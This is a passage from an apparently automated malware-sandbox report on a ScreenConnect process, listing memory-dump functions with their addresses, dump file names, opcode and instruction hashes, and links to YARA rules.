Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e62d635e63acf4f91f07b13b5ee8d73772e327410fac260fb1edfff99b101727
Instruction ID: 6f7b8c205a4c75f42ec7e0986752579f40ce8f920624a220141ad87902769949
Opcode Fuzzy Hash: e62d635e63acf4f91f07b13b5ee8d73772e327410fac260fb1edfff99b101727
Instruction Fuzzy Hash: 1F31CF31B19E4E4FDB95EBAC98246FE77E1FF48320B5501BAE40DD3291EE25E9018781

Function 00007FFD9B89726E Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e5039f0a67f469b1e8e8311785f193c3da2482885eb412a6f849a2d87c7ee8
Instruction ID: b5cff3b13fe89f4dcacba872b8da10d939c15326b9d57137b49ce65521b7ab27
Opcode Fuzzy Hash: 07e5039f0a67f469b1e8e8311785f193c3da2482885eb412a6f849a2d87c7ee8
Instruction Fuzzy Hash: CA31C431F1E50E4EEB64EFA9C8526BD37D1EB8A321F10013AE05EC31D6DA25B9428341

Function 00007FFD9BBA0DA9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2977e6a7dbe586e99bd3b67a29b1eef5cd9979d3a4a95956008bb3bc04a05232
Instruction ID: 517e9aeaa65e029b00982074bb2cf17ff8f758be8d2820cc54d896c368d036e6
Opcode Fuzzy Hash: 2977e6a7dbe586e99bd3b67a29b1eef5cd9979d3a4a95956008bb3bc04a05232
Instruction Fuzzy Hash: 21313A63E0A4AA8AE7259EBCD8758E53790FF10B0CF094176D0EE8B0E3FD196A025640

Function 00007FFD9B89B8AD Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c2580c6f6291f53a96de5876e10bdd42680a08f8ce0c3fc175f75c80249275d
Instruction ID: c9489bc779fc63b34da1fdc25ca09d4552525d270604d30e79de0c59092ac89c
Opcode Fuzzy Hash: 5c2580c6f6291f53a96de5876e10bdd42680a08f8ce0c3fc175f75c80249275d
Instruction Fuzzy Hash: E331D431A2EB8E0FDB89DB7888655B97BF0FF59210B0541FBD418C71E7EE2499458341

Function 00007FFD9B89A637 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1c47a3d3d47a70a71199ef05cb29be9388bc96aad580519f889f44266da88b
Instruction ID: 51d9f4aa101051deb5daa514fbf0fd13dc392bad12b3aa6cb59d256b27ea368a
Opcode Fuzzy Hash: 9d1c47a3d3d47a70a71199ef05cb29be9388bc96aad580519f889f44266da88b
Instruction Fuzzy Hash: 5731E83171DE4E4FDF58AB689859AE6B7D1FF58354B00057AD40EC3196ED35E8068780

Function 00007FFD9BBA6E68 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527c063a2edba24b90c683acd6736065325a6aa748b8cf403d0c515d850b1a12
Instruction ID: 5439780182eee9afd473ae2f960d17ff3441c964122d91075d8121cee7c4cbd0
Opcode Fuzzy Hash: 527c063a2edba24b90c683acd6736065325a6aa748b8cf403d0c515d850b1a12
Instruction Fuzzy Hash: 8931D672B0D9490FE7E8DA6CE4A46A573C2FF98358B1801BAD44EC72E6ED16AD45C340

Function 00007FFD9BBACBCD Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cd2fcb63eee9a2eb99bad832f7e713d0c99dd02fb4a189050e082d39843c68
Instruction ID: b91c5f0de4e790f0183b869518d11fcf7785c13841232a30ffd479958dfa3e91
Opcode Fuzzy Hash: 74cd2fcb63eee9a2eb99bad832f7e713d0c99dd02fb4a189050e082d39843c68
Instruction Fuzzy Hash: 62210B62A1DE891FD76C9A285C2A5A577D1FFA9750B05007FE44DC31E3ED247D0643C2

Function 00007FFD9B898B7A Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d78d7770d7bc9f02facda47526a8c3b48de77837ef44d23b52cc01faea6480
Instruction ID: 683423a08751ff6dc553e461809567afd32f6b17a476f7c09d7d985877e03753
Opcode Fuzzy Hash: e6d78d7770d7bc9f02facda47526a8c3b48de77837ef44d23b52cc01faea6480
Instruction Fuzzy Hash: 80219E62B0FE0F0FFEE8A6AC18A52781BC2EBAC3D1715057AD44DC32A2ED15AC464240

Function 00007FFD9B8981C5 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d0c43fa42135558f3c8d0dd0ae23802a7f4b5c9187b595eb5caf594409dc91
Instruction ID: 36339f909ae8c5d292682a014273edd954e398b5c01b11298a90ed7361eb3be4
Opcode Fuzzy Hash: 95d0c43fa42135558f3c8d0dd0ae23802a7f4b5c9187b595eb5caf594409dc91
Instruction Fuzzy Hash: 8E319030B1DA5E4FDF9CEF689865AA973A1FF68300B150479E01EC32D6DE34A9418B80

Function 00007FFD9B89EA78 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adf32bb16e9f8d1c2bcbfd873b2b2376c7eecccee3da6d12e99816a0689eff42
Instruction ID: e17bd0af79575a905f3c1e791f86f4cc44cbe7c3da9448562c9c44541f2b48f6
Opcode Fuzzy Hash: adf32bb16e9f8d1c2bcbfd873b2b2376c7eecccee3da6d12e99816a0689eff42
Instruction Fuzzy Hash: C621561171EA8E4FDB2997685C745B13FE1EFAA20175940FBE048C71B6ED189C4A8341

Function 00007FFD9B89D9F1 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d14bfa109fd9f16e2a141c905ca831f0b00b7dc32e57467c664093de3aafe74
Instruction ID: 44e26db8b580d68e166cdafb67b715bed46a53dab297f19de8489ce3a155af97
Opcode Fuzzy Hash: 5d14bfa109fd9f16e2a141c905ca831f0b00b7dc32e57467c664093de3aafe74
Instruction Fuzzy Hash: 2431B421A0F7CD9FEB5A9B6488A56A87FE0EF56200F4504EBD084C71F3DD682E95C342

Function 00007FFD9B8960BF Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebc48e360eaa28142deae142b71dd5b1dd8347ca0a8efb63b4e09f97f3686938
Instruction ID: e0e693562089ce4f36882ef54c9fbfadcf1a3d63af3d1c51f74d9fd423788b7a
Opcode Fuzzy Hash: ebc48e360eaa28142deae142b71dd5b1dd8347ca0a8efb63b4e09f97f3686938
Instruction Fuzzy Hash: B1215697F0E62E4BEB556BBCB8764F87F60DF846A0B0502B7C19DCA0E3DC1425474291

Function 00007FFD9BBA82C9 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93cfd4818c9d49b8379cfe29bac8d9ba562be0b103d43b15df1f3ce1142e516
Instruction ID: 21ad557bafa69c5b9269dcfebcb7cb4082bbcc9f3477055046ebec5b480cfd01
Opcode Fuzzy Hash: a93cfd4818c9d49b8379cfe29bac8d9ba562be0b103d43b15df1f3ce1142e516
Instruction Fuzzy Hash: 1D31C773F0EA4D4FEBA5A6A86C311E87BD1FF44354F4601A7F54CC75E2DA19A9008345

Function 00007FFD9B897686 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea18e43795da6d58faad6f48de2f1f0b66ab53f03b7b12a3ae5f76c56444fdd7
Instruction ID: 9eeaeca88dca5dc786a223b2925d32f691de0b2a7f77dc38b21e118a532de3b7
Opcode Fuzzy Hash: ea18e43795da6d58faad6f48de2f1f0b66ab53f03b7b12a3ae5f76c56444fdd7
Instruction Fuzzy Hash: FD21B772B1E61C1FEB68A75CA8165F937D5EB8A370F10013FE05EC22A2ED266D534384

Function 00007FFD9B8ACE48 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb6758cb2562642a1ecedebccfabc8f0f0b5ae8295fc9aa085414fb7b5f20513
Instruction ID: 7e58006dc4b83c81ced22cba3ff9be81be3f228499d325eb12c2b9010eb3668a
Opcode Fuzzy Hash: cb6758cb2562642a1ecedebccfabc8f0f0b5ae8295fc9aa085414fb7b5f20513
Instruction Fuzzy Hash: D8210A72B1EE4C4BEB68A75D6C7A0B936D2EFCD324B05016FF04DD32A3DD1168028685

Function 00007FFD9BBA9D0C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a93db9802f8cd1f9b12fa4d3b7636297e7997ece63f6aebf8990cc3a534ce5
Instruction ID: 3f950a206b87b3c3ebd61d26ebb361a185ecb8a1a52657a7594b98750404c06c
Opcode Fuzzy Hash: b8a93db9802f8cd1f9b12fa4d3b7636297e7997ece63f6aebf8990cc3a534ce5
Instruction Fuzzy Hash: CD312772F1EE4D0FEF99DB689474AA837D2FF98344B0501A9E0DDC32E2DE24A9018340

Function 00007FFD9BBACC0D Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca17e5a749413e36a8e4c5376dcae1e65e115b87e0b1212ba9c629a38dd02c6
Instruction ID: ad44a8ccc12780d427d8d13de6a6a8061c6f884ebf9f86eb5ad4c524a3d21a55
Opcode Fuzzy Hash: 7ca17e5a749413e36a8e4c5376dcae1e65e115b87e0b1212ba9c629a38dd02c6
Instruction Fuzzy Hash: DF210C62A1DE891BD76CAA18886656577D1FFA8750F01007FE44DC32E3FD247D0643C2

Function 00007FFD9B898BA9 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 381f6f89c5f467608415a73cbc655264c2c1f612ff848f1fda39d6161e4d3d1a
Instruction ID: df430604620804088c119d0160959aec861e053db2ff4de56ab558176b9169f2
Opcode Fuzzy Hash: 381f6f89c5f467608415a73cbc655264c2c1f612ff848f1fda39d6161e4d3d1a
Instruction Fuzzy Hash: AE215062B1EE0F1FFFE8A79C18A52795AC2EBAC395710457AD44DC32A6ED14AC474240

Function 00007FFD9B897201 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77673fcf13bb0dd20806a5d641a6e41984be7538566b37b22ff998acb41e2826
Instruction ID: cf048d9f1092bf437db54e4a8190ae42f9135a0c086e32602c144078d0bbba88
Opcode Fuzzy Hash: 77673fcf13bb0dd20806a5d641a6e41984be7538566b37b22ff998acb41e2826
Instruction Fuzzy Hash: 4A210B32B1E51D5EFB68EB99D8125FD37E5EB8A320F10013ED05EC3192EA25B9438380

Function 00007FFD9B8990F2 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ca0bc86f467b3ab30733eef3f36584400f432d699b69d9ce5c7d471d31b12a
Instruction ID: 24669719e76750bc0b03e2fcd97bfbde50acab096148ae5c99eeb98bbd3d1c44
Opcode Fuzzy Hash: d0ca0bc86f467b3ab30733eef3f36584400f432d699b69d9ce5c7d471d31b12a
Instruction Fuzzy Hash: 40213B4270FAC90FEB55A77C68A95E57F90EFA617470941F7C098CB2E7EC1898478341

Function 00007FFD9B897333 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3ae4dce0b1ef7c0e90b1facd36bc7fc8384fc1a6653bf24896952447bba04d1
Instruction ID: bd816461d06d7822b589e5ca5d8149bff574bae8ecef5d99cb28695d36fd88ca
Opcode Fuzzy Hash: d3ae4dce0b1ef7c0e90b1facd36bc7fc8384fc1a6653bf24896952447bba04d1
Instruction Fuzzy Hash: AC21F672B1D90D5EEB5CBB58A8525F977A4EB49320F00017FD41EC2197ED25B9138385

Function 00007FFD9B8952B0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0354cbb39cd538c06448328bcd64e74b691ca33ca0a99bfd3410f1299d283a0
Instruction ID: b530cdf012f5768fc596f6a1ad1a54b18c953844b43e700b09b577b52b27aed2
Opcode Fuzzy Hash: e0354cbb39cd538c06448328bcd64e74b691ca33ca0a99bfd3410f1299d283a0
Instruction Fuzzy Hash: 1B217932A0894D8FD7B0FB6C98559E97BE0FF9E318B0402BBE448C3162D9256845C390

Function 00007FFD9B8BA6A0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64cf910629ca6917687bbcb073f0383fd9df05bde2e1e9af9e802c8330c7b2f2
Instruction ID: f2a1033a3c216f55041887d53268c0e0812326921592e6282767ae7431ce9b7a
Opcode Fuzzy Hash: 64cf910629ca6917687bbcb073f0383fd9df05bde2e1e9af9e802c8330c7b2f2
Instruction Fuzzy Hash: 2E31B734A18A4D8FDF88EF58C898AA977F1FF68300F5104A9E41DC7295DB75E951CB40

Function 00007FFD9BBA0E5D Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be34f12deab22136e1413799d90c589632249061b478c87307498409f9ad3530
Instruction ID: e68ac1427ec64dc8969cf224c49d5f3d90dafd88710663a825cf9fe11d2ca664
Opcode Fuzzy Hash: be34f12deab22136e1413799d90c589632249061b478c87307498409f9ad3530
Instruction Fuzzy Hash: F621E772E0B99A8BEB614A7CC8648A577E0FF10B48F060176C4DD870E2ED197A069A40

Function 00007FFD9B891AC0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78d43a965a603de75bcc38ca364bdc94c3d424e151d0e24261aeba90aa119f74
Instruction ID: b6d5087110280dd15ec3d639d4d20b96c59d01ac108eb800a98b351962a03417
Opcode Fuzzy Hash: 78d43a965a603de75bcc38ca364bdc94c3d424e151d0e24261aeba90aa119f74
Instruction Fuzzy Hash: B1215721B2C6180BEB685B2C64367BA72C5EB8C314F51003DF54EC33D6DE28AD024681

Function 00007FFD9BBAE5B2 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e44c1b0cc92de70b81d6670154d144a41fe5a1ce22af795e23e7f410550e107
Instruction ID: 78c02ee21abf57ecd634b0765785235124a32535af0a7a53b8dbd0bb613debed
Opcode Fuzzy Hash: 2e44c1b0cc92de70b81d6670154d144a41fe5a1ce22af795e23e7f410550e107
Instruction Fuzzy Hash: 84316570E0A70E4BF3A8FAA8C0263B933D1FB45304F61453EC448C32E2EC286A4A4791

Function 00007FFD9B8952D0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ada83be80f6a3a10aadb986ba83d1f3525a7410028138a09fdbf730d934106
Instruction ID: 82acfa6cb5a023fdc405b1e379cf90e991c2ac2f04fe7e2ae61a037e80833fac
Opcode Fuzzy Hash: 17ada83be80f6a3a10aadb986ba83d1f3525a7410028138a09fdbf730d934106
Instruction Fuzzy Hash: FF210572A19D4D8FEBA0FFAC88559A977E1FF6D354B0102BAE41DC31A1DA25AD01C780

Function 00007FFD9BBA8E64 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742a3477fabdbaa31a8d0be88e8fbca53057e13d4c248a2bf214ca5ecee565aa
Instruction ID: 6be0d18f424a99ee8ec333358085b33966c5011b8a1d8f91bf133d6d0fd474b6
Opcode Fuzzy Hash: 742a3477fabdbaa31a8d0be88e8fbca53057e13d4c248a2bf214ca5ecee565aa
Instruction Fuzzy Hash: 92219432F1EA498EEBA5CB64ACB05B87AE2FF55308F850479E04DC35F2DE256902C701

Function 00007FFD9B8A0018 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbfc543ec1102a2b93d82ef0f388d5555f5e0c5c79818bf0ee0513d920ca553
Instruction ID: 8f9d68fff834f13e4eb164be549968f7143a3129ae477eb2f5335afcd7bfae04
Opcode Fuzzy Hash: dfbfc543ec1102a2b93d82ef0f388d5555f5e0c5c79818bf0ee0513d920ca553
Instruction Fuzzy Hash: 5121D732E1AE5D8FEBB8DB6888652B97BE0FF5D700F04047BD45DD21A1DE2469418741

Function 00007FFD9BBAC0A0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a651cc4ab5410c56737d2e0603a1f4d4819000e08808815256f8ccaf7879125d
Instruction ID: f2d99ac6720c0f97c10b99ce359a234ab2feb94025c1f90194d9e3b2cb6302f3
Opcode Fuzzy Hash: a651cc4ab5410c56737d2e0603a1f4d4819000e08808815256f8ccaf7879125d
Instruction Fuzzy Hash: E211CC32A08A4C4FDBA4DF28CC14AA27BC1FF98368B44417ED40DC7291DE35E9468380

Function 00007FFD9BBA6D40 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe6b2a975c021e424858d54f4afcd959200a77d0a0b52d753eb74829676a84f
Instruction ID: 39fc6f78b2a45dbc3de7c9eddd637c93e63f31e3cf0af119b899d6275edcb5b8
Opcode Fuzzy Hash: cbe6b2a975c021e424858d54f4afcd959200a77d0a0b52d753eb74829676a84f
Instruction Fuzzy Hash: F821A461F1EA5E4EEBB593AC44702B866D2FF89348F5601BAC48EC72F2CD18AD059341

Function 00007FFD9BBA4CE6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0333e2143d5515ff40befa692be812aa71e5ae64b2e80427101fc429a1669e3b
Instruction ID: 4eaaf2994ac7d92f6c0f53d1deb06ba87e49cb733f160ac854f1b5545ddb5d85
Opcode Fuzzy Hash: 0333e2143d5515ff40befa692be812aa71e5ae64b2e80427101fc429a1669e3b
Instruction Fuzzy Hash: 30219672E0EA8C5EFF96CBA858741A87FE1FF55708B0604ADE49CD31A2DB256900C741

Function 00007FFD9B89FF8A Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3b8b296c754dc52bf7d8939e2059bd0d0d8b0ea47a0d8452dd589cd8234304e
Instruction ID: e5118a99e672176229355c47e8381d457da1247c1491b7035533a3ff511169f1
Opcode Fuzzy Hash: a3b8b296c754dc52bf7d8939e2059bd0d0d8b0ea47a0d8452dd589cd8234304e
Instruction Fuzzy Hash: FD11E962A0FE97AFFA69577D48A60746FD0FF6664070942BBC0B8C20F3DE15F8058244

Function 00007FFD9B8A0F41 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b267d404a7680c9b6492df39ef48111e818378db1e403838336eb160b978aac0
Instruction ID: 694602dc800a8d878f4277ca8fb20e19e16a39a540bb4c190574246518b47bfc
Opcode Fuzzy Hash: b267d404a7680c9b6492df39ef48111e818378db1e403838336eb160b978aac0
Instruction Fuzzy Hash: 40112331A1E94C4FEB60DF68C418AEA7BE0FFA9300F0601B6E44CD71A1DA25AA54C7D1

Function 00007FFD9BBA4D1D Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3fecea457f1636ac8e3667b186e766441e377be9601a77998c50bb83a2cfea
Instruction ID: 71fea4dab9fdb7230e76285b77e39410809f16d87fef360edcf35d80bad3dbc5
Opcode Fuzzy Hash: ef3fecea457f1636ac8e3667b186e766441e377be9601a77998c50bb83a2cfea
Instruction Fuzzy Hash: BE11B772E0EA4C4BEF91CFA868751A83BE1FF55708F0605AEE098C32A2DB256901C745

Function 00007FFD9B890678 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
